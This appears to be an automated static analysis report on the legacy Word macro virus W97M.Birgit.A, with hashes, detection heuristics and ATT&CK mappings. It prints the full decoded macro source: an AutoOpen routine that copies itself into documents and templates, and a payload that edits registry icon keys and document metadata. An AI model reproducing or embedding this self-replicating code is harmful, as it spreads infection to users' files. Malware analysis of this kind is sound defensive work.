W97M.Birgit.A — Office (OLE) malware analysis

Static analysis result for SHA-256 62475be683e0f2c6…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 29.0 KB
Created: 1998-07-20 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d93b2bcd5d0de7de53bc6fb252feece8
SHA-1: 75f6683d7379c62c3c09e4ee79e9845585a7f060
SHA-256: 62475be683e0f2c619857c942dea0c7a902407158cded43fb96845272792db3d
Risk Score: 136

Malware Insights

W97M.Birgit.A · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of macro-based malware. The script attempts to copy itself to other documents and modifies registry keys related to Word icons, likely to establish persistence or spread. The ClamAV detection name 'Doc.Trojan.Brigit-1' further supports the classification as malware.

Heuristics (5)

  • ClamAV: Doc.Trojan.Brigit-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Brigit-1
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    Matched line in script: Sub AutoOpen()
  • Auto_Close macro (severity: low, rule: OLE_VBA_AUTOCLOSE)
    Matched line in script: uCkAc$ = "AutoClose"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1930 bytes
SHA-256: 0835341f5f1ef57872165f56a38da4b07615c7ecd11112532f1fee0402f9a618
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'****************************************
'* ULTRAS CONSTRUCTION KIT FOR WORD 7.0 *
'*            Version 1.0               *
'****************************************
'Name Macro Virus: "W97M.Birgit.A"
'************************************************************
'* AutoOpen macro                                           *
'************************************************************
Sub AutoOpen()
On Error Resume Next
uCkAo$ = filename$() + ":AutoOpen"
uCkAc$ = "AutoClose"
uCkAx$ = "AutoExec"
uCkAn$ = "AutoNew"
uCkAe$ = "AutoExit"
uCkTm$ = "ToolsMacro"
uCkFt$ = "FileTemplates"
uCkTc$ = "ToolsCustomize"
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSaveAs .Format = 1
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSave
Payload
End Sub
Sub Payload()
U = Int(Rnd() * 30) + 1
If Day(Now()) = U Then
    SetPrivateProfileString "HKEY_CLASSES_ROOT\WORD.DOCUMENT.6\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,31", ""
    SetPrivateProfileString "HKEY_CLASSES_ROOT\Word.Template\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,32", ""
AppHide ("Program Manager")
FileSummaryInfo Author:= = "Doctor Rave"
FileSummaryInfo Subject:="Virus"
FileSummaryInfo Title:="W97M.Birgit.A"
FileSummaryInfo Keywords:=""
FileSummaryInfo Comments:="Infected"
MsgBox ("This Virus is dedicated to Birgit R*B*T*C*E*"), ("W97M.Birgit.A")
End Sub